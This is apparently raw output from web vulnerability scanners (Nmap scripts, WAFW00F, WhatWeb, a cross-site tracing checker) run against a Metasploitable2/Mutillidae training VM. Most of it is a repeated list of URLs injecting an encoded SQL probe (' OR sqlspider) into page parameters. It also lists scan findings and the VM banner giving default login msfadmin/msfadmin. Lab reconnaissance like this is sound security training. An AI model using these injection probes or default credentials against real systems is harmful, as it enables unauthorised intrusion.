http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=show%2dlog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=source%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm&do=toggle%2dhints%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=installation%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=framing%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm&do=toggle%2dsecurity%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=home%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=show%2dlog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=installation%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=framing%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=source%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=home%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=installation%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=home%2ephp&do=toggle%2dhints%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=framing%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=home%2ephp&do=toggle%2dsecurity%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=installation%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=php%2derrors%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=usage%2dinstructions%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=source%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=notes%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=show%2dlog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=home%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=installation%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=register%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=home%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=framing%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=source%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=show%2dlog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider |_ http://192.168.1.113/mutillidae/./?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-trace: TRACE is enabled | http-useragent-tester: | | Allowed User Agents: | Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) | libwww | lwp-trivial | libcurl-agent/1.0 | PHP/ | Python-urllib/2.5 | GT::WWW | Snoopy | MFC_Tear_Sample | HTTP::Lite | PHPCrawl | URI::Fetch | Zend_Http_Client | http client | PECL::HTTP | Wget/1.13.4 (linux-gnu) | WWW-Mechanize/1.34 |_ MAC Address: 00:0C:29:0E:B0:99 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 59.81 seconds ^ ^ _ __ _ ____ _ __ _ _ ____ ///7/ /.' \ / __////7/ /,' \ ,' \ / __/ | V V // o // _/ | V V // 0 // 0 // _/ |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/ < ...' WAFW00F - Web Application Firewall Detection Tool By Sandro Gauci && Wendel G. Henrique Checking http://192.168.1.113 Generic Detection results: No WAF detected by the generic detection Number of requests: 13 http://192.168.1.113 [200] Apache[2.2.8], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) DAV/2], IP[192.168.1.113], PHP[5.2.4-2ubuntu5.10], Title[Metasploitable2 - Linux], WebDAV[2], X-Powered-By[PHP/5.2.4-2ubuntu5.10] __ ______ _____ \ \/ / ___|_ _| \ /\___ \ | | / \ ___) || | /_/\_|____/ |_| + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield + -- --=[Target: 192.168.1.113:80 + -- --=[Site vulnerable to Cross-Site Tracing! + -- --=[Site is vulnerable to host header injection! + -- --=[Site vulnerable to Cross-Frame Scripting! + -- --=[Site vulnerable to Clickjacking! HTTP/1.1 200 OK Date: Sat, 05 Sep 2015 12:35:21 GMT Server: Apache/2.2.8 (Ubuntu) DAV/2 Transfer-Encoding: chunked Content-Type: message/http 4b TRACE / HTTP/1.1 Test: Host: 192.168.1.113 0 HTTP/1.1 200 OK Date: Sat, 05 Sep 2015 12:35:21 GMT Server: Apache/2.2.8 (Ubuntu) DAV/2 X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 891 Content-Type: text/html Metasploitable2 - Linux

                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ 
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ 
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started